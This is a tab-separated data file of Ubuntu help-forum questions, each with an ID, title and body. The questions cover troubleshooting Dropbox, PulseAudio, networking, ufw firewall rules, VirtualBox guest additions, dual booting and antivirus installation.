489340	dropbox stuck on computer , eating up cpu	having some trouble with dropbox on my new ubuntu 12.04 computer . no other threads have helped : / dropbox installation corrupted i think . interfering with all other commands i try to do through /var/lib/dpkg/lock . i think dropbox is the process interfering with the lock . used suggdested command from other threads : sudo apt-get remove dropbox ; rm -rvf ~/.dropbox ~/.dropbox-dist
489341	compiz got removed by chance and ubuntu dashboard and other features are not working . ( ubuntu 14.04 )	i tried the following getting compiz back after removing ccsm gives me an error like no module named pygtk i tried this as well ca n't start unity from command line tried this as well accidentally removed ubuntu-desktop and unity when removing compiz , how do i get them back ? nothing worked any help is appreciated .
489343	how can i use ldap authentication with full disk encryption ?	i 'm evaluating ( x ) ubuntu client for my companies software developer . we must use full disk encryption because of software , which does n't save their files in /home ( like databases ) . the company uses `` active directory '' as ldap solution . at system start i would want the ldap user authentication to unlock the encryption . is this easily possible with linux tools ? i know of lvm with luks , but afaik that 's one password and not connectable with ldap . a similar solution for windows is `` drivelock '' .
489348	can not get public ubuntu vm on the internet	i have just created a headless ubuntu server . typically , i 've not had a problem getting the ips to work but i 'm not sure what the deal in this case is . here is my interfaces file , which the system created when i initially installed ubuntu : # this file describes the network interfaces available on your system # and how to activate them . for more information , see interfaces ( 5 ) . # the loopback network interface auto lo iface lo inet loopback # the primary network interface auto eth0 iface eth0 inet static address 63.141.224.204 netmask 255.255.255.248 network 63.141.224.200 broadcast 63.141.224.207 gateway 63.141.224.201 # dns-* options are implemented by the resolvconf package , if installed dns-nameservers 8.8.8.8 8.8.4.4 dns-search asezo.com i can connect to this server from another virtual machine on the network but i can not connect to it from outside of it . also , i can not ping anything such as google.com . i checked a few things but i 'm not great with networks and i 'm still learning . this is what i have read to look for but i 'm not sure what i 'm looking for with each of these : lyon : ~ $ ping google.com ping : unknown host google.com lyon : ~ $ route kernel ip routing table destination gateway genmask flags metric ref use iface default 63.141.224.201 0.0.0.0 ug 0 0 0 eth0 localnet * 255.255.255.248 u 0 0 0 eth0 lyon : ~ $ ifconfig eth0 link encap : ethernet hwaddr 00:15:5d : b3 : ea:08 inet addr:63.141.224.204 bcast:63.141.224.207 mask:255.255.255.248 inet6 addr : fe80 : :215:5dff : feb3 : ea08/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:1878 errors:0 dropped:0 overruns:0 frame:0 tx packets:819 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:166226 ( 166.2 kb ) tx bytes:76161 ( 76.1 kb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) i 'm not sure if it matters but i am hosting it on a windows 2012 r2 hyperv machine . any help would be greatly appreciated !
489349	ftp/sftp not allowing any writing	i 'm using ubuntu 14.04 and vsftpd . in the past my account ( not root ) has had full access , more or less , to either ftp or sftp to anything on my server and edit any file that my user account could edit . now , recently , i can not edit anything , only view . as a specific example , i can not upload to /var/www even though my user is a member of the www-data group and that group owns the files ( file/folder permissions are correct ) . i 'm not terribly familiar with vsftpd and how it works . i mainly need to be able to ftp or sftp to my /var/www directory to edit my website . what could be my problem ? edit : the specific error message when using ftp is 553 could not create file .
489353	upgrade broke audio	after upgrading ubuntu this morning , all audio has stopped working ... i 'm assuming it 's a pulse audio issue as i get the following : pulseaudio -v i : [ pulseaudio ] main.c : setrlimit ( rlimit_nice , ( 31 , 31 ) ) failed : operation not permitted i : [ pulseaudio ] main.c : setrlimit ( rlimit_rtprio , ( 9 , 9 ) ) failed : operation not permitted i : [ pulseaudio ] core-util.c : failed to acquire high-priority scheduling : permission denied i : [ pulseaudio ] main.c : this is pulseaudio 4.0 i : [ pulseaudio ] main.c : page size is 4096 bytes i : [ pulseaudio ] main.c : machine id is c94b482b20ac1ad8ed79d2d9537936d8 . i : [ pulseaudio ] main.c : session id is 1 . i : [ pulseaudio ] main.c : using runtime directory /run/user/1000/pulse . i : [ pulseaudio ] main.c : using state directory /home/grmrgecko/.config/pulse . i : [ pulseaudio ] main.c : using modules directory /usr/lib/pulse-4.0/modules . i : [ pulseaudio ] main.c : running in system mode : no i : [ pulseaudio ] main.c : fresh high-resolution timers available ! bon appetit ! e : [ pulseaudio ] inotify-wrapper.c : inotify_add_watch ( ) failed : no space left on device i : [ pulseaudio ] cpu-x86.c : cpu flags : cmov mmx sse sse2 sse3 ssse3 sse4_1 sse4_2 i : [ pulseaudio ] svolume_mmx.c : initialising mmx optimized volume functions . i : [ pulseaudio ] remap_mmx.c : initialising mmx optimized remappers . i : [ pulseaudio ] svolume_sse.c : initialising sse2 optimized volume functions . i : [ pulseaudio ] remap_sse.c : initialising sse2 optimized remappers . i : [ pulseaudio ] sconv_sse.c : initialising sse2 optimized conversions . i : [ pulseaudio ] svolume_orc.c : initialising orc optimized volume functions . i : [ pulseaudio ] module-device-restore.c : successfully opened database file '/home/grmrgecko/.config/pulse/c94b482b20ac1ad8ed79d2d9537936d8-device-volumes ' . i : [ pulseaudio ] module.c : loaded `` module-device-restore '' ( index : # 0 ; argument : `` '' ) . i : [ pulseaudio ] module-stream-restore.c : successfully opened database file '/home/grmrgecko/.config/pulse/c94b482b20ac1ad8ed79d2d9537936d8-stream-volumes ' . i : [ pulseaudio ] module.c : loaded `` module-stream-restore '' ( index : # 1 ; argument : `` '' ) . i : [ pulseaudio ] module-card-restore.c : successfully opened database file '/home/grmrgecko/.config/pulse/c94b482b20ac1ad8ed79d2d9537936d8-card-database ' . i : [ pulseaudio ] module.c : loaded `` module-card-restore '' ( index : # 2 ; argument : `` '' ) . i : [ pulseaudio ] module.c : loaded `` module-augment-properties '' ( index : # 3 ; argument : `` '' ) . i : [ pulseaudio ] module.c : loaded `` module-switch-on-port-available '' ( index : # 4 ; argument : `` '' ) . e : [ pulseaudio ] module-udev-detect.c : you apparently ran out of inotify watches , probably because tracker/beagle took them all away . i wished people would do their homework first and fix inotify before using it for watching whole directory trees which is something the current inotify is certainly not useful for . please make sure to drop the tracker/beagle guys a line complaining about their broken use of inotify . e : [ pulseaudio ] module-udev-detect.c : you apparently ran out of inotify watches , probably because tracker/beagle took them all away . i wished people would do their homework first and fix inotify before using it for watching whole directory trees which is something the current inotify is certainly not useful for . please make sure to drop the tracker/beagle guys a line complaining about their broken use of inotify . e : [ pulseaudio ] module-udev-detect.c : you apparently ran out of inotify watches , probably because tracker/beagle took them all away . i wished people would do their homework first and fix inotify before using it for watching whole directory trees which is something the current inotify is certainly not useful for . please make sure to drop the tracker/beagle guys a line complaining about their broken use of inotify . i : [ pulseaudio ] module-udev-detect.c : found 2 cards . i : [ pulseaudio ] module.c : loaded `` module-udev-detect '' ( index : # 5 ; argument : `` '' ) . i : [ pulseaudio ] module.c : loaded `` module-bluetooth-policy '' ( index : # 6 ; argument : `` '' ) . i : [ pulseaudio ] module.c : loaded `` module-bluetooth-discover '' ( index : # 7 ; argument : `` '' ) . i : [ pulseaudio ] module.c : loaded `` module-native-protocol-unix '' ( index : # 8 ; argument : `` '' ) . i : [ pulseaudio ] module-default-device-restore.c : saved default sink 'alsa_output.pci-0000_00_03.0.hdmi-stereo-extra1 ' not existent , not restoring default sink setting . i : [ pulseaudio ] module-default-device-restore.c : saved default source 'alsa_input.pci-0000_00_1b.0.analog-stereo ' not existent , not restoring default source setting . i : [ pulseaudio ] module.c : loaded `` module-default-device-restore '' ( index : # 9 ; argument : `` '' ) . i : [ pulseaudio ] module.c : loaded `` module-rescue-streams '' ( index : # 10 ; argument : `` '' ) . i : [ pulseaudio ] sink.c : created sink 0 `` auto_null '' with sample spec s16le 2ch 44100hz and channel map front-left , front-right i : [ pulseaudio ] sink.c : device.description = `` dummy output '' i : [ pulseaudio ] sink.c : device.class = `` abstract '' i : [ pulseaudio ] sink.c : device.icon_name = `` audio-card '' i : [ pulseaudio ] source.c : created source 0 `` auto_null.monitor '' with sample spec s16le 2ch 44100hz and channel map front-left , front-right i : [ pulseaudio ] source.c : device.description = `` monitor of dummy output '' i : [ pulseaudio ] source.c : device.class = `` monitor '' i : [ pulseaudio ] source.c : device.icon_name = `` audio-input-microphone '' i : [ pulseaudio ] module.c : loaded `` module-null-sink '' ( index : # 11 ; argument : `` sink_name=auto_null sink_properties='device.description= '' dummy output '' ' '' ) . i : [ pulseaudio ] module.c : loaded `` module-always-sink '' ( index : # 12 ; argument : `` '' ) . i : [ pulseaudio ] module.c : loaded `` module-intended-roles '' ( index : # 13 ; argument : `` '' ) . i : [ pulseaudio ] module.c : loaded `` module-suspend-on-idle '' ( index : # 14 ; argument : `` '' ) . e : [ pulseaudio ] module-systemd-login.c : failed to create session monitor : no space left on device e : [ pulseaudio ] module.c : failed to load module `` module-systemd-login '' ( argument : `` '' ) : initialization failed . e : [ pulseaudio ] main.c : module load failed . e : [ pulseaudio ] main.c : failed to initialize daemon . i : [ pulseaudio ] module.c : unloading `` module-suspend-on-idle '' ( index : # 14 ) . i : [ pulseaudio ] module.c : unloaded `` module-suspend-on-idle '' ( index : # 14 ) . i : [ pulseaudio ] module.c : unloading `` module-intended-roles '' ( index : # 13 ) . i : [ pulseaudio ] module.c : unloaded `` module-intended-roles '' ( index : # 13 ) . i : [ pulseaudio ] module.c : unloading `` module-always-sink '' ( index : # 12 ) . i : [ pulseaudio ] module.c : unloaded `` module-always-sink '' ( index : # 12 ) . i : [ pulseaudio ] module.c : unloading `` module-null-sink '' ( index : # 11 ) . i : [ pulseaudio ] sink.c : freeing sink 0 `` auto_null '' i : [ pulseaudio ] source.c : freeing source 0 `` auto_null.monitor '' i : [ pulseaudio ] module.c : unloaded `` module-null-sink '' ( index : # 11 ) . i : [ pulseaudio ] module.c : unloading `` module-rescue-streams '' ( index : # 10 ) . i : [ pulseaudio ] module.c : unloaded `` module-rescue-streams '' ( index : # 10 ) . i : [ pulseaudio ] module.c : unloading `` module-default-device-restore '' ( index : # 9 ) . i : [ pulseaudio ] module.c : unloaded `` module-default-device-restore '' ( index : # 9 ) . i : [ pulseaudio ] module.c : unloading `` module-native-protocol-unix '' ( index : # 8 ) . i : [ pulseaudio ] module.c : unloaded `` module-native-protocol-unix '' ( index : # 8 ) . i : [ pulseaudio ] module.c : unloading `` module-bluetooth-discover '' ( index : # 7 ) . i : [ pulseaudio ] module.c : unloaded `` module-bluetooth-discover '' ( index : # 7 ) . i : [ pulseaudio ] module.c : unloading `` module-bluetooth-policy '' ( index : # 6 ) . i : [ pulseaudio ] module.c : unloaded `` module-bluetooth-policy '' ( index : # 6 ) . i : [ pulseaudio ] module.c : unloading `` module-udev-detect '' ( index : # 5 ) . i : [ pulseaudio ] module.c : unloaded `` module-udev-detect '' ( index : # 5 ) . i : [ pulseaudio ] module.c : unloading `` module-switch-on-port-available '' ( index : # 4 ) . i : [ pulseaudio ] module.c : unloaded `` module-switch-on-port-available '' ( index : # 4 ) . i : [ pulseaudio ] module.c : unloading `` module-augment-properties '' ( index : # 3 ) . i : [ pulseaudio ] module.c : unloaded `` module-augment-properties '' ( index : # 3 ) . i : [ pulseaudio ] module.c : unloading `` module-card-restore '' ( index : # 2 ) . i : [ pulseaudio ] module.c : unloaded `` module-card-restore '' ( index : # 2 ) . i : [ pulseaudio ] module.c : unloading `` module-stream-restore '' ( index : # 1 ) . i : [ pulseaudio ] module.c : unloaded `` module-stream-restore '' ( index : # 1 ) . i : [ pulseaudio ] module.c : unloading `` module-device-restore '' ( index : # 0 ) . i : [ pulseaudio ] module.c : unloaded `` module-device-restore '' ( index : # 0 ) . i : [ pulseaudio ] main.c : daemon terminated . lspci shows the cards , so does alsamixer . lspci 00:00.0 host bridge : intel corporation 4th gen core processor dram controller ( rev 06 ) 00:02.0 vga compatible controller : intel corporation xeon e3-1200 v3/4th gen core processor integrated graphics controller ( rev 06 ) 00:03.0 audio device : intel corporation xeon e3-1200 v3/4th gen core processor hd audio controller ( rev 06 ) 00:14.0 usb controller : intel corporation 8 series/c220 series chipset family usb xhci ( rev 05 ) 00:16.0 communication controller : intel corporation 8 series/c220 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 8 series/c220 series chipset family usb ehci # 2 ( rev 05 ) 00:1b.0 audio device : intel corporation 8 series/c220 series chipset high definition audio controller ( rev 05 ) 00:1c.0 pci bridge : intel corporation 8 series/c220 series chipset family pci express root port # 1 ( rev d5 ) 00:1c.5 pci bridge : intel corporation 8 series/c220 series chipset family pci express root port # 6 ( rev d5 ) 00:1c.6 pci bridge : intel corporation 82801 pci bridge ( rev d5 ) 00:1d.0 usb controller : intel corporation 8 series/c220 series chipset family usb ehci # 1 ( rev 05 ) 00:1f.0 isa bridge : intel corporation b85 express lpc controller ( rev 05 ) 00:1f.2 sata controller : intel corporation 8 series/c220 series chipset family 6-port sata controller 1 [ ahci mode ] ( rev 05 ) 00:1f.3 smbus : intel corporation 8 series/c220 series chipset family smbus controller ( rev 05 ) 02:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller ( rev 0c ) 03:00.0 pci bridge : asmedia technology inc. asm1083/1085 pcie to pci bridge ( rev 04 ) after having this failure , i googled and found someone saying to purge and re-install both pulse and alsa , i did so with no effect . any help would be amazing , thanks .
489354	how to install mysql , mysql workbench on ubuntu 14.04	i am having problems trying to install mysql workbench . says there is no mysqlclient installed , but i already have . and when you run mysql server also gives error . i am using mysql 5:16:17 . how do i uninstall mysql and install a version that can work with workbench ? note : i will work with these mysql with rvm and ruby 1.8.7 . these are already installed . what should i do ?
489355	tmp dir 100 % full only 56k out of 1mb being used	i know there are lots of posts on in the stack exchange web with problems similar to mine but i have not found one that quite helps yet . as you can see from the output below df shows my /tmp directory to be completely full . this has happened to me before in the past and it was easy to spot the large file ( s ) causing the problem . $ df -h /tmp/ filesystem size used avail use % mounted on - 1.0m 1.0m 0 100 % /tmp this time there are no large files , in fact du and ls will confirm this $ du -h /tmp/ 0 /tmp/.ice-unix 0 /tmp/.x11-unix 56k /tmp/ $ ls -lahtr total 60k drwxrwxrwt 2 root root 40 mar 7 22:17 .x11-unix drwxrwxrwt 2 root root 40 mar 7 22:17 .ice-unix -rw -- -- -- - 1 root root 1 mar 9 09:37 filevzlnrc -rw -- -- -- - 1 root root 0 may 1 14:02 file6lz1vs -rw -- -- -- - 1 root root 0 may 1 14:28 file7elzd8 drwxr-xr-x 24 root root 4.0k jun 27 10:45 .. -rw-rw-r -- 1 vlc vlc 0 jun 27 21:02 camp_report_log2 -rw-rw-r -- 1 vlc vlc 36 jun 28 06:00 usage -rw-rw-r -- 1 vlc vlc 0 jun 28 06:00 load_span -rw-r -- r -- 1 root root 1 jun 28 15:57 voa_somali.log -rw-r -- r -- 1 root root 1 jun 28 15:57 vision_pm.log -rw-r -- r -- 1 root root 1 jun 28 15:57 vision_am.log -rw-r -- r -- 1 root root 1 jun 28 15:57 sc_serv.log -rw-r -- r -- 1 root root 1 jun 28 15:57 scoop.log -rw-r -- r -- 1 root root 1 jun 28 15:57 ranmase.log -rw-r -- r -- 1 root root 1 jun 28 15:57 okazyon.log -rw-r -- r -- 1 root root 1 jun 28 15:57 n4e.log -rw-r -- r -- 1 root root 1 jun 28 15:57 kiskeya_sunday.log -rw-r -- r -- 1 root root 1 jun 28 15:57 intersection.log -rw-r -- r -- 1 root root 1 jun 28 15:57 ghana.log -rw-r -- r -- 1 root root 1 jun 28 15:57 bbc_somali.log drwxrwxrwt 4 root root 440 jun 28 15:57 . so i am still getting errors like these $ crontab -e /tmp/crontab.0kgihv/crontab : no space left on device $ echo 'test ' | mail -s 'test ' user @ mail.com mail : can not send message : no space left on device what else could casue the /tmp dir to fill ?
489356	installing ubuntu 14.04 on 2nd hdd of win8.1 machine	i have been trying to get ubuntu to install on 2nd hdd of my win8.1 machine , but i keep failing . the installer does n't see my hdd configuration correctly and combines the total space of both hdd 's and does not recognize win8.1 as an os . however , gparted gives me a different story . it shows the layout of both hdd 's correctly with win8.1 on primary hdd and a 100 mb system reserved partition on 2nd hdd . the 2nd hdd has 550+ gb of unallocated space available . when i try to create a primary partition on 2nd hdd , it errors out saying the drive is in use by the system even though i am running ubuntu from a thumb drive . uefi was never enabled on this system and fast boot is turned off . my pc was built using an asus gene iii mobo , 8 gb of ram , an intel 950 cpu , and a nvidia 650ti . at one point , i had been using the marvel raid controller for a raid 0 setup ; however , i went back to a non-raid setup later when doing a fresh install . so , what am i missing ? thanks !
489357	differencce between samba server trusty and precise	i have a strange file sharing performance results when installed new home server to 14.04 lts trusty . i have always been using samba mount with rsize=8192 , wsize=8192 on clients ( more than one ) , and it worked well , some 80 upto 100mb/s real file copy using dd , what i consider a wirespeed of gigabit lan . that was precise 12.04 lts server . now i installed trusty on a new low power `` nas '' with intel baytrail board , and did get 22 or some 26mb/s from those same clients . that is poor imho , for gigabit lan , and would be a signifficant downgrade.. the point of question is , revealed by the occasion when i ( accidentaly ) forgot to add those rsize=8192 and wsize=8192 parameters , and speed jumped to 100mb/s or even higher , at once . pretty nice from a toy like j1800 mobo , lan and sata2 only onboard , and using zfs over notebook hdd's.. anyway , something is different than it was in 12.04 lts precise . this experience seems very strange to me , and i think there is something i just do not understand , and i would like to . can someone tell a word or few about what could be new in this samba tuning thing , explicitly in trusty 14.04 lts , please ?
489359	can not install/run ubuntu without acpi=off & nomodeset etc	i 've had this problem for a while . i reluctently just used windows . i no longer wish to be without linux on my laptop . why is this happening : either with cd or usb install the installer can not get past bootup ( it stops at the kubuntu splash ) . with nomodeset it sometimes manges to get to the run or install option , but freezes shortly after . i eventually managed to get it installed by adding noapic acpi=off and nomodeset together as a last ditch effort . however with these options on its just , terrible . it does n't show battery options , the keyboard , even on a light and fast keypress , occasionally spams keys as if i had been holding them down for several seconds . as well as not being able to install amd drivers without adding -- force . which i just tried and now it starts without a gui . attempting to load the gui with the startx command also fails . my laptop is a clevo p570wm with intel i7-3970x cpu and 2x amd radeon hd 7970m gpu 's . the ubuntu distro is kubuntu 14.04 x64 . edit : forgot to say i also tried to fix the problem by updating the kernel to 3.14.1-generic , did n't help .
489365	help ... ..ubuntu desk top not showing up after login	when ever i login to ubuntu it only shows the background and nothing else . please help ! before the problem i was getting a lot of unity errors and if it may help i 'm using 12.04 lts .
489367	login screen half black	first time asking something in here , usually i search a lot before post but this time i 've not found anything related to my problem i 've been trying to change my login screen background and after lots of trials and errors i 've finnaly did it , but suddenly a annoying problem appeared , everytime i boot-up the system , at the login screen half of the screen ( almost half ) is black , like if my screen resolution was wrong and i do n't know how to fix it , can somebody help me please ? ubuntu 14.04 lts edit . : missing ubuntu version
489368	install ubuntu on usb stick - `` error loading operating system ''	i want to install ubuntu 14.04 on usb stick , then install some drivers and programs on it and use it when i need . i have one usb stick with ubuntu 14.04 that i have used to install the os on other pcs . the second usb stick is usb 3.0 . i have both of them plugged in my pc and boot from the first one . during the installation i have formatted the usb 3.0 drive to ext4 and install the os on it . it took a long time ( about 4 hours ) . unfortunately , after restarting the pc and trying to boot from the usb 3.0 i am getting the following error : error loading operating system also , i have windows 8 , ubuntu 14.05 and ubuntu 13.10 on my pc . i have restarted again hoping that he ubuntu installed on the usb 3.0 will be found , but it had not been . could you tell what i am doing wrong ? the usb 3.0 is 8 gb .
489369	determine if you have a 64bit processor	i would like to find out on the console if my processor is 64 bit capable . i can find out that i have installed the 32 bit version of ubuntu with uname -a if it does n't contain 64 at all , then i know i have a 32 bit kernel . but how can i find out if i could install the 64 bit version as well ?
489370	efibootmgr numbering	i was wondering if there is any way to modify the actual number of efi bootmgr entries . for example : if i have something like this : ... ... ... ... ... ... ... ... ... ... ... ... . boot0002* ubuntu hd ( 2,96800,32000,24a3a80f-cec6-4698-a123-5a3b2c756688 ) file ( \efi\ubuntu\grubx64.efi ) rc boot0005* windows boot manager hd ( 2,96800,32000,24a3a80f-cec6-4698-a123-5a3b2c756688 ) file ( \efi\microsoft\boot\bootmgfw.efi ) windows ... ... ... x ... b.c.d.o.b.j.e.c.t.=. { .9.d.e.a.8.6.2.c.-.5.c.d.d.-.4.e.7.0.-.a.c.c.1.-.f.3.2.b.3.4.4.d.4.7.9.5. } ... 3 ... ... ... ... . is there any way to make boot0002 in boot0001 and boot0005 in boot0002 ?
489373	accessing onedrive files on a ntfs partition from ubuntu 14.04	i have dual boot on my computer , win 8.1 and ubuntu 14.04 . it works great . there is one thing that puzzles me though . i mounted ntfs partition so i can see it in `` files '' app and work with it normaly and i even pointed ubuntu dropbox there , to save some space ( both windows and ubuntu dropbox installations are pointing to the same folder on ntfs disk ) . the thing is , when i try to access onedrive folder , instead of files i get something wierd . this is how dropbox files look like : this is how onedrive folder looks like in ubuntu when i right click on one of the files in onedrive folder it says its type is `` link to symbolic link ( inode/symlink ) '' all my other files on ntfs partition seem to look ok ( and i can work with them - i.e . open - normaly from `` files '' app ) what am i missing here ? how can i access onedrive files ?
489380	unable to migrate vm from redhat to ubuntu using virsh migrate	i 'm unable to migrate the vm from redhat to ubuntu using the virsh migrate due to following error . any suggestions on how to debug this issue . virsh migrate -- live -- verbose -- persistent vm1 qemu+ssh : //host-3/system error : can not check qemu binary /usr/libexec/qemu-kvm : no such file or directory in the destination ubuntu host qemu-kvm is at /usr/share/qemu-kvm .
489382	why are n't these ufw rules working ?	i 'm trying to configure ufw to only allow connections to 3 ip addresses on my local network , and deny everything else . here 's the commands i 'm using : yes | sudo ufw reset sudo ufw default deny sudo ufw allow in from 192.168.11.109 sudo ufw allow in from 192.168.11.118 sudo ufw allow in from 192.168.11.212 sudo ufw allow out to 192.168.11.109 sudo ufw allow out to 192.168.11.118 sudo ufw allow out to 192.168.11.212 sudo ufw enable sudo ufw status verbose everything seems to work . here 's the result of the status command : joel @ walker11 ~ > sudo ufw status verbose status : active logging : on ( low ) default : deny ( incoming ) , deny ( outgoing ) , disabled ( routed ) new profiles : skip to action from -- -- -- -- -- -- anywhere allow in 192.168.11.109 anywhere allow in 192.168.11.118 anywhere allow in 192.168.11.212 192.168.11.109 allow out anywhere 192.168.11.118 allow out anywhere 192.168.11.212 allow out anywhere however , i can not ping any of those ip addresses that i explicitly allowed : joel @ walker11 ~ > ping 192.168.11.109 ping 192.168.11.109 ( 192.168.11.109 ) 56 ( 84 ) bytes of data . ping : sendmsg : operation not permitted ping : sendmsg : operation not permitted ^c -- - 192.168.11.109 ping statistics -- - 2 packets transmitted , 0 received , 100 % packet loss , time 1007ms how can i setup my firewall to allow traffic to/from those ip addresses ?
489385	uvd not responding ; ati/intel hybrid after upgrade to 13.04 and turning off ati	first of all i am totally new to ubuntu and linux so i am still trying to learn commands and basics . my laptop is an acer 4820tg with a hybrid intel onboard and a ati radeon mobility hd5650 . several months ago i installed ubuntu 12.04 lts as a dual boot next to my windows 7 . a few days ago the ati card decided to die ( artifacts and bluescreen while booting ) . as this is quite an old laptop now ( 4 years ) , i wanted to use this opportunity to get back to ubuntu , as gaming will be not possible any longer anyways . so after a lot of googling and searching i managed to boot into ubuntu 12.04 avoiding my now dead ati ( not as easy as it may sound , for a total beginner that is ) . using the following commands from ubuntu precise installation sudo apt-get remove -- purge xserver-xorg-video-ati xserver-xorg-video-radeon sudo apt-get install xserver-xorg-video-ati sudo apt-get install -- reinstall libgl1-mesa-glx libgl1-mesa-dri xserver-xorg-core sudo mv /etc/x11/xorg.conf /etc/x11/xorg.conf.backup sudo rm -rf /etc/ati followed by switching to the intel gpu after booting using the following edits gksu gedit /etc/default/grub changing `` grub_cmdline_linux_default= '' quiet splash pcie_aspm=force '' sudo update-grub gksu gedit /etc/rc.local adding `` sudo echo off > /sys/kernel/debug/vgaswitcheroo/switch '' this worked quite fine , the ati card was disabled , temperature went down to 45째c . now my goal is to upgrade to 14.04 lts . however it seemed that using the upgrade option i only had the possibility to upgrade to the next higher version . therefore i first upgraded to 12.10 and now i am at 13.04 . unfortunately i now have the following problem in 13.04 : i made the same edits as in 12.04 and 12.10 in order to turn off the ati card . however now when i want to boot into 13.04 i get the following error [ drm : r600_uvd_init ] *error* uvd not responding trying to reset the vcpu ! ! ! this repeats several times [ drm : r600_uvd_init ] *error* uvd not responding giving up ! ! ! [ drm : evergreen_startup ] *error* radeon : error initializing uvd ( -1 ) . radeon 0000:01:00.0 : gpu lockup cp stall for more than 10000msec [ drm : r600_lb_test ] *error* radeon : fence wait failed ( -35 ) . [ drm : radeon_lb_ring_tests ] *error* radeon : failed testing ib on gfx ring ( -35 ) . [ drm : radeon_device_init ] *error* lb ring test failed ( -35 ) . this results in either a white screen with mouse pointer and the possibility to switch via ctrl-alt-f1 to the terminal or on chance a switch to the actual intel gpu followed by the login screen and a fine running ubuntu . however as this is very inconsistent and i am afraid that the same will happen on 14.04 lts after i upgrade i wanted to ask you guys what would be the proper way to continue at this point .
489387	android avd is not starting due to a missing file	i am using 12.04 lts ubuntu and have installed everything like eclipse and android sdk . now i have created new avd and click on start but it is giving me error : starting emulator for avd 'new ' failed to start emulator : can not run program `` /home/hacked/workspace/android/android-sdk-linux/tools/emulator '' : error=2 , no such file or directory i am newbie to ubuntu as well as to android , so i followed this tutorial when i went to /android-sdk-linux/tools manually , i clicked on emulator but even it did n't start . is that because of the .exe file format of the emulator ?
489389	guest additions on ubuntu ca n't find kernel headers	edit : installing the lastest virtualbox version made it work . i ca n't install virtualbox 's guest additions on ubuntu . i 've already did this , sudo apt-get install build-essential linux-headers-`uname -r` dkms this is my /var/log/vboxadd-install.log , and this is my terminal output , root @ virtualbox : /media/username/vboxadditions_4.3.0_89960 # ./vboxlinuxadditions.run verifying archive integrity ... all good . uncompressing virtualbox 4.3.0 guest additions for linux ... ... ... ... virtualbox guest additions installer removing installed version 4.3.0 of virtualbox guest additions ... copying additional installer modules ... installing additional modules ... removing existing virtualbox dkms kernel modules ... done . removing existing virtualbox non-dkms kernel modules ... done . building the virtualbox guest additions kernel modules the headers for the current running kernel were not found . if the following module compilation fails then this could be the reason . building the main guest additions module ... fail ! ( look at /var/log/vboxadd-install.log to find out what went wrong ) doing non-kernel setup of the guest additions ... done . installing the window system drivers warning : unknown version of the x window system installed . not installing x window system drivers . ... done . installing graphics libraries and desktop services components ... done . these are my `` linux '' packages , username @ virtualbox : /media/username/vboxadditions_4.3.0_89960 $ dpkg -- get-selections | grep linux libselinux1 : amd64 install linux-firmware install linux-generic install linux-headers-3.13.0-29 install linux-headers-3.13.0-29-generic install linux-headers-3.13.0-30 install linux-headers-3.13.0-30-generic install linux-headers-generic install linux-image-3.13.0-29-generic install linux-image-3.13.0-30-generic install linux-image-extra-3.13.0-29-generic install linux-image-extra-3.13.0-30-generic install linux-image-generic install linux-libc-dev : amd64 install linux-sound-base install pptp-linux install util-linux install and my installed version , username @ virtualbox : /media/username/vboxadditions_4.3.0_89960 $ uname -a linux virtualbox 3.13.0-30-generic # 54-ubuntu smp mon jun 9 22:45:01 utc 2014 x86_64 x86_64 x86_64 gnu/linux
489390	how can i setup my ssd+hdd-setup the best way ?	i have recently build a new system with a 256gb ssd and a 3tb hdd . i want to save all my files on my hdd while my programs and ubuntu 14.04 should run on my ssd to boost the performance . i might also be installing a windows version later , but i am not so sure about that ... how can i do that ? is it possible to do that without reinstalling ubuntu ? edit : when i installed ubuntu 14.04 64-bit on my system i chose ubuntu to get installed on my ssd with the auto-partitioner . i have not yet copied my data from my ext . hard drive to my internal storage , as i want it to go to the hdd , while all my installs should go to my ssd . later i might want another ssd-partition for windows ( if i install it ) to use as my oprating system for gaming .
489393	wifi connects to nothing ?	when i resume my laptop from sleep the wireless connection will be connecting to a blank space . to fix it i have to disconnect , wait a few seconds and them reconnect to my network . is there any way to stop it from connecting to this blank network ?
489395	ubuntu has disappeared from my dual boot system	my set up is dual boot ( i presume ... ) with xp pro and ubuntu 14.02 . but ubuntu has disappeared - the purple screen with the os options no longer appears , and my machine automatically boots into windows . i have a boot repair cd which works sometimes - which is to say after running it and rebooting i am sometimes presented with the purple screen with my os options . but even on these rare occasions , before i can get into ubuntu a number of other screens appear with a lot of fine text in computerese , which - i guess - hints at some serious problems under the hood . any suggestions ? do i have to reinstall ?
489396	useradd not asking for a password ?	i created new users from the terminal using sudo useradd -g mygroup testuser but i wasnât prompted to set a password ? why was that ? the users have now been created but i need to set a password for them , so how can i do this ? thanks
489398	daemonize process with autostart	i have simple script written in ruby . i 'd like to run as a background task ( daemon process or service ) . what is more want to have control over it so that i can start and stop it . it will be perfect if process can be started automatically when my vps restarts . is there any way to do that ?
489399	how to filter grep results ?	i am new at writing scripts . so i am hoping this is simple . the script i am writing is used to gather system information and save it as an html file . when i run : sudo lshw -short it list all of the hardware on a system . when i run : sudo lshw -short | grep processor it returns ( the dots represent spaces ) /0/4 ... ... ... ... ... ... ... ... ... ... ... ... ... ... .processor ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... amd fx ( tm ) -6100 six-core processor '' my question is how to i remove everything in front of processor . or how do i only display what is after `` processor '' . i tried several other options for grep and tried to find an awk command to work , but i have failed in my attempts . if more information is need let me know .
489407	launcher tooltips	is there any way to disable the launcher tooltips ? if they would just flash on and flash off , i would n't mind them , but they stay on forever and obscure what i 'm working on . alternatively , is there any way to move the launcher to the right side of the screen ? that would be better .
489408	install a virus scanner with apt-get	i tried apt-cache search virus but only found clamav that supposed to find not so many viruses and produces lots of positives . is there a way to install another virusscan program than clamav on ubuntu with apt-get ?
